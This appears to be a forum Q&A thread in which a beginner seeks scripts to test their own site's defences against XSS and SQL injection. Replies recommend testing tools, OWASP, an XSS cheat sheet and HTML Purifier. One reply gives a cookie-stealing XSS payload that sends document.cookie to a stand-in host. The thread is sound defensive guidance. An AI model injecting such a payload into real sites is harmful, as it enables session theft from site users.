I am testing out my scripts to see if they will prevent xss and sql injections. Can someone provide me with some basic but good scripts that would "hack" into my programs. I want to test my scripts before it goes online.
EDIT: Thank you all for those links, they contain loads and loads of information. But for a beginner to security, is there a recommended site that's? I'm not sure if I am ready to dive straight into in-dept security issues. I like the links waiwai933 recommended.
Each situation requires different scripts, so there is no 'one size fits all' that anyone could provide. The list of scripts that would need to be tested goes into the thousands before you can be certain that your site is safe.
You may want to check Firefox or Chrome plugins which allow you to test SQL injections. I suggest this one, but you may want to look for others as well: https://addons.mozilla.org/en-US/firefox/addon/6727. What this does is that it allows you to provide a list of injection scripts, which it probably provides a few by default, and then once you activate it, it bombards your site with these scripts and lets you see where the vulnerabilities are.
I suggest this site for some example XSS scripts: http://ha.ckers.org/xss.html
The most simple one which doesn't get blocked by browsers and can happen easily if you don't strip_tags() is the following code:
<script>(new Image).src = 'http://nasty.com/logSessions.php?s=' + document.cookie;</script>
Googe's new jarslberg instructional site is a great resource to teach you how to write and defend against XSS and several other security attacks.
+1 for caring and knowing enough to ask. Since you're asking security questions I'd like to recommend the OWASP web site if you're not already familiar. You'll find all sorts of information over and above what you've asked., not to mention tons of info on preventing all sorts of attacks. The site is an invaluable tool for web developers.
http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
I have used this tool to some great results.
The XSS cheatsheet at http://ha.ckers.org/xss.html is a good collection of XSS tests. I would not recommend implementing your own XSS checker, though; it is a lot harder than detecting SQL injections (as you will probably realize upon seeing some of the examples in the cheatsheet). The only solid method is to parse the code, build a DOM tree from it and transform that tree back to HTML, and that is a lot of work, and other people have done it already. Use something like HTML Purifier.